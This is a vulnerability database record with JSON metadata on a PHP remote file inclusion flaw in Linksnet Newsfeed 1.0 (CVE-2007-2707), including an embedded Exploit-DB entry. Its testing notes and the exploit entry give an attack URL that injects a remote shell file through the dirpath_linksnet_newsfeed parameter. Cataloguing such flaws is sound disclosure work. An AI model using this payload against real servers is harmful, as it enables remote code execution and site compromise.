ID OSVDB:36050Type osvdbReporter OSVDBModified 2007-05-14T04:49:04
Description
Technical Description
This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).
Manual Testing Notes
http://[target]/[Linksnet_Newsfeed_1_0_path]/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed= shetll.txt?
References:
Secunia Advisory ID:25271
Other Advisory URL: http://milw0rm.com/exploits/3923
ISS X-Force ID: 34297
FrSIRT Advisory: ADV-2007-1826
CVE-2007-2707
Bugtraq ID: 23982
{"href": "https://vulners.com/osvdb/OSVDB:36050", "history": [], "id": "OSVDB:36050", "reporter": "OSVDB", "published": "2007-05-14T04:49:04", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/[Linksnet_Newsfeed_1_0_path]/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed= shetll.txt?\n## References:\n[Secunia Advisory ID:25271](https://secuniaresearch.flexerasoftware.com/advisories/25271/)\nOther Advisory URL: http://milw0rm.com/exploits/3923\nISS X-Force ID: 34297\nFrSIRT Advisory: ADV-2007-1826\n[CVE-2007-2707](https://vulners.com/cve/CVE-2007-2707)\nBugtraq ID: 23982\n", "title": "Linksnet Newsfeed linksnet_linkslog_rss.php dirpath_linksnet_newsfeed Variable Remote File Inclusion", "lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "hash": "67cc9affdbd19182d8dcfd8213093ed85997666a5002ecc60fda7d605f23acfb", "references": [], "edition": 1, "cvelist": ["CVE-2007-2707"], "affectedSoftware": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2707"]}, {"type": "exploitdb", "idList": ["EDB-ID:3923"]}, {"type": "canvas", "idList": ["LINKSNET_INCLUDE"]}], "modified": "2017-04-28T13:20:32"}, "vulnersScore": 5.0}, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "91179c8e83a247ba989b02b04bf6ac04"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "15a03345f9024ff70ecbaf97488c298d"}, {"key": "href", "hash": "f1ae7d8f3024481ad3ca0019b11366a8"}, {"key": "modified", "hash": "c448e5c3d6b9c9e0f38f1eefb0de1296"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "c448e5c3d6b9c9e0f38f1eefb0de1296"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "cd15a2759ba6710dec4f618218964e4b"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "objectVersion": "1.2", "modified": "2007-05-14T04:49:04"}
{"cve": [{"lastseen": "2017-10-11T11:07:09", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in linksnet_linkslog_rss.php in Linksnet Newsfeed 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the dirpath_linksnet_newsfeed parameter.", "modified": "2017-10-10T21:32:20", "published": "2007-05-16T06:19:00", "id": "CVE-2007-2707", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2707", "title": "CVE-2007-2707", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2016-09-25T14:13:47", "bulletinFamily": "exploit", "description": "**Name**| linksnet_include \n---|--- \n**CVE**| CVE-2007-2707 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Linksnet Newsfeed =>1.0 \n**Notes**| CVSS: 6.8 \nRepeatability: Infinite \nVENDOR: Linksnet \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2707 \nCVE Name: CVE-2007-2707 \n\n", "modified": "2007-05-16T06:19:00", "published": "2007-05-16T06:19:00", "id": "LINKSNET_INCLUDE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/linksnet_include", "title": "Immunity Canvas: LINKSNET_INCLUDE", "type": "canvas", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T19:37:15", "bulletinFamily": "exploit", "description": "Linksnet Newsfeed 1.0 Remote File Inclusion Vulnerability. CVE-2007-2707. Webapps exploit for php platform", "modified": "2007-05-14T00:00:00", "published": "2007-05-14T00:00:00", "id": "EDB-ID:3923", "href": "https://www.exploit-db.com/exploits/3923/", "type": "exploitdb", "title": "linksnet newsfeed 1.0 - Remote File Inclusion Vulnerability", "sourceData": "#Linksnet Newsfeed =>1.0 Remote file inclusion\n\n#Download script : http://www.linksnet.de/mat/Linksnet_Newsfeed_1_0.zip\n\n#Thanks Str0ke\n\n#Exploit :\n\n#http://victime.com/[Linksnet_Newsfeed_1_0_path]/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed= shetll.txt?\n\n#Discovered by ThE TiGeR\n\n#Miro_Tiger[at]Hotmail[dot]com\n\n# milw0rm.com [2007-05-14]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3923/"}]}
